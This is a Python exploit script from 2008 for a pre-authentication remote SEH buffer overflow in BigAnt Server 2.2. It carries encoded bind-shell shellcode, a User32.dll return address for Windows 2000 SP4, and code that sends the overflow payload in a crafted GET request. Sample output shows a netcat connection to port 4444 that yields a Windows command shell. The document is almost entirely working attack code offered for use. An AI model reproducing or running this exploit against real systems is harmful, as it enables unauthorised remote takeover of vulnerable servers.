antserver_exploit.py.txt
Posted on 16 April 2008
#!/usr/bin/python ############################################################################### # BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day) # Matteo Memelli aka ryujin # www.be4mind.com - www.gray-world.net # 04/13/2008 # Tested on Windows 2000 Sp4 English # Vulnerable process is AntServer.exe # Offset for SEH overwrite is 954 Bytes # #------------------------------------------------------------------------------ # muts you gave me the wrong pill! it's your fault!!! # I wanna go back to the matrix #------------------------------------------------------------------------------ # # bt ~ # ./antserver_exploit.py -H 192.168.1.195 -P 6080 # [+] Connecting to host... # [+] Overflowing the buffer... # [+] Done! Check your shell on 192.168.1.195:6080 # bt ~ # nc -vv 192.168.1.195 4444 # 192.168.1.195: inverse host lookup failed: Unknown host # (UNKNOWN) [192.168.1.195] 4444 (krb524) open # Microsoft Windows 2000 [Version 5.00.2195] # (C) Copyright 1985-2000 Microsoft Corp. # # C:WINNTsystem32> # ############################################################################### from socket import * from optparse import OptionParser import sys print "[*********************************************************************]" print "[* *]" print "[* BigAnt Server PreAuth Remote SEH Overflow (0day) *]" print "[* Discovered and Coded By *]" print "[* Matteo Memelli *]" print "[* (ryujin) *]" print "[* www.be4mind.com - www.gray-world.net *]" print "[* *]" print "[*********************************************************************]" usage = "%prog -H TARGET_HOST -P TARGET_PORT" parser = OptionParser(usage=usage) parser.add_option("-H", "--target_host", type="string", action="store", dest="HOST", help="Target Host") parser.add_option("-P", "--target_port", type="int", action="store", dest="PORT", help="Target Port") (options, args) = parser.parse_args() HOST = options.HOST PORT = options.PORT if not (HOST and PORT): parser.print_help() sys.exit() # Tried with SEH/THREAD/PROCESS but server crashes anyway # [*] x86/alpha_mixed succeeded, final size 698 SEH shellcode = ( "x89xe1xdaxc0xd9x71xf4x58x50x59x49x49x49x49x49" "x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a" "x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32" "x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49" "x4bx4cx43x5ax4ax4bx50x4dx4bx58x4ax59x4bx4fx4b" "x4fx4bx4fx43x50x4cx4bx42x4cx47x54x47x54x4cx4b" "x47x35x47x4cx4cx4bx43x4cx44x45x43x48x45x51x4a" "x4fx4cx4bx50x4fx44x58x4cx4bx51x4fx51x30x45x51" "x4ax4bx47x39x4cx4bx50x34x4cx4bx43x31x4ax4ex46" "x51x49x50x4ax39x4ex4cx4dx54x49x50x42x54x44x47" "x49x51x49x5ax44x4dx43x31x49x52x4ax4bx4cx34x47" "x4bx46x34x47x54x47x58x42x55x4bx55x4cx4bx51x4f" "x46x44x43x31x4ax4bx43x56x4cx4bx44x4cx50x4bx4c" "x4bx51x4fx45x4cx43x31x4ax4bx44x43x46x4cx4cx4b" "x4dx59x42x4cx47x54x45x4cx45x31x49x53x50x31x49" "x4bx42x44x4cx4bx47x33x50x30x4cx4bx47x30x44x4c" "x4cx4bx44x30x45x4cx4ex4dx4cx4bx47x30x43x38x51" "x4ex45x38x4cx4ex50x4ex44x4ex4ax4cx50x50x4bx4f" "x4ex36x42x46x51x43x42x46x43x58x47x43x50x32x42" "x48x42x57x43x43x50x32x51x4fx51x44x4bx4fx4ex30" "x43x58x48x4bx4ax4dx4bx4cx47x4bx46x30x4bx4fx4e" "x36x51x4fx4dx59x4dx35x45x36x4bx31x4ax4dx45x58" "x43x32x50x55x42x4ax44x42x4bx4fx48x50x43x58x49" "x49x45x59x4cx35x4ex4dx50x57x4bx4fx48x56x46x33" "x46x33x50x53x50x53x46x33x47x33x46x33x51x53x46" "x33x4bx4fx4ex30x45x36x42x48x42x31x51x4cx45x36" "x50x53x4bx39x4dx31x4cx55x42x48x49x34x44x5ax44" "x30x49x57x50x57x4bx4fx49x46x42x4ax42x30x46x31" "x51x45x4bx4fx48x50x43x58x4ex44x4ex4dx46x4ex4b" "x59x51x47x4bx4fx48x56x46x33x50x55x4bx4fx48x50" "x42x48x4ax45x47x39x4bx36x47x39x51x47x4bx4fx4e" "x36x46x30x46x34x46x34x50x55x4bx4fx4ex30x4ax33" "x43x58x4ax47x44x39x49x56x44x39x46x37x4bx4fx49" "x46x46x35x4bx4fx48x50x42x46x43x5ax42x44x45x36" "x42x48x45x33x42x4dx4cx49x4dx35x42x4ax50x50x46" "x39x47x59x48x4cx4dx59x4ax47x43x5ax51x54x4dx59" "x4ax42x46x51x49x50x4cx33x4ex4ax4bx4ex51x52x46" "x4dx4bx4ex50x42x46x4cx4dx43x4cx4dx42x5ax46x58" "x4ex4bx4ex4bx4ex4bx42x48x43x42x4bx4ex4ex53x42" "x36x4bx4fx43x45x51x54x4bx4fx48x56x51x4bx50x57" "x46x32x46x31x50x51x50x51x43x5ax43x31x46x31x50" "x51x51x45x50x51x4bx4fx4ex30x42x48x4ex4dx49x49" "x43x35x48x4ex50x53x4bx4fx49x46x43x5ax4bx4fx4b" "x4fx47x47x4bx4fx4ex30x4cx4bx51x47x4bx4cx4bx33" "x48x44x45x34x4bx4fx49x46x46x32x4bx4fx4ex30x45" "x38x4ax50x4cx4ax44x44x51x4fx51x43x4bx4fx48x56" "x4bx4fx48x50x44x4ax41x41" ) # 77F8AEDC POP POP RET User32.dll Win 2000 Sp4 evilbuf = 'x90'*252 + shellcode + 'xebx06x90x90' + \n'xDCxAExF8x77' + 'x90'*8 + 'xE9x82xFCxFFxFF' + \n'C'*1225 print '[+] Connecting to host...' s = socket(AF_INET, SOCK_STREAM) s.connect(('192.168.1.195', 6080)) print '[+] Overflowing the buffer...' s.send('GET ' + evilbuf + " ") s.close() print '[+] Done! Check your shell on %s:%d' % (HOST, PORT)